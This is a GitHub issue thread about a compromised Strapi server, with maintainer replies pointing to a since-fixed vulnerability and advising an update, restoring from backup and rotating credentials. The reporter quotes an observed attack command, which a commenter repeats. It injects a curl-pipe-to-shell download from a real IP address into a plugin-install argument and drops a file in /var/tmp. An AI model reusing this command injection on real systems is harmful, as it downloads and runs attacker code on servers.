### ISSUE TITLE
Malware Injection

### ISSUE THREAD

**Issue by sunithakarthikeyan** [strapi/strapi#4722]
**Describe the bug**
Malware Injection

**Steps to reproduce the behavior**
1. Developed Application on Strapi
2. Its behind Nginx
3. Suddenly after few weeks system is not responding
4. System under Malware attack

**Expected behavior**
**Screenshots**
[log.txt](https://github.com/strapi/strapi/files/3959869/log.txt)
**Code snippets**
If applicable, add code samples to help explain your problem.

**System**

- Node.js version: v10.16.0
- NPM version:6.9.0
- Strapi version: 3.0.0-beta.17.4
- Database:Mongo :v4.0.10
- Operating system:Ubuntu 18.04

**Additional context**
> strapi "install" "documentation && $(curl 142.44.191.122/st.sh|sh)"
var/tmp/kinsing

**Comment by jesusprubio** [comment]
Are you running `strapi "install" "documentation && $(curl 142.44.191.122/st.sh|sh)"` in your machine?

Where did you find that command?

**Comment by derrickmehaffy** [comment]
This security issue was fixed (beta.17.5?) I'd recommend you update to the latest version (beta.17.8)

**Comment by derrickmehaffy** [comment]
This security issue was fixed (beta.17.5?) I'd recommend you update to the latest version (beta.17.8)

**Comment by derrickmehaffy** [comment]
It was a security risk that was already fixed, you should update ASAP and I would recommend you restore data from a backup and change all your security keys and passwords as your server is likely compromised.

Marking as closed.

**Comment by MargaritaDB** [comment]
What was the security risk in? Nginx? where can i find details?
